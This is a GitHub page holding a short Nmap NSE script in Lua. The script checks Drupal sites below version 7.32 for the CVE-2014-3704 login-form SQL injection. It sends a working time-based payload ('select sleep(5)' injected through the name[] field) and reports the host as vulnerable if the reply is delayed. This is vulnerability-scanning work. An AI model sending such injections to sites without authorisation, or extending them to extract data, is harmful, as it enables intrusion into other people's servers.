-
Notifications
You must be signed in to change notification settings - Fork 15
/
drupal-CVE-2014-3704.nse
44 lines (33 loc) · 1.21 KB
/
drupal-CVE-2014-3704.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
-- plugin description
description = [[
test for the vulnerabilitie CVE-2014-3704 in drupal CMS
SQL injection in login form
current test with a SLEEP() injection no data injected
version < 7.32 vuln
]]
author = "0x25"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "intrusive"}
portrule = shortport.http
action = function(host, port)
local output_tab = stdnse.output_table()
local options = {}
options['header'] = {}
local start,delay
local sleep = 5
local payload = "name%5B0%3B+select+sleep%28"..sleep.."%29%3B+--+-%5D=name1&name%5B0%5D=name2&pass=pass&form_build_id=xxx&form_id=user_login_block&op=Log+in"
local path = "/?q=node&destination=no"
options['header']['Content-Type'] = 'application/x-www-form-urlencoded'
start = stdnse.clock_ms()
http.post(host.name,port.number,path,options,nil,payload)
delay = stdnse.clock_ms() - start
if delay>sleep then
output_tab.result = "Server seems to be vuln to CVE-2014-3704"
output_tab.sleep = sleep
output_tab.delay = delay
return output_tab
end
end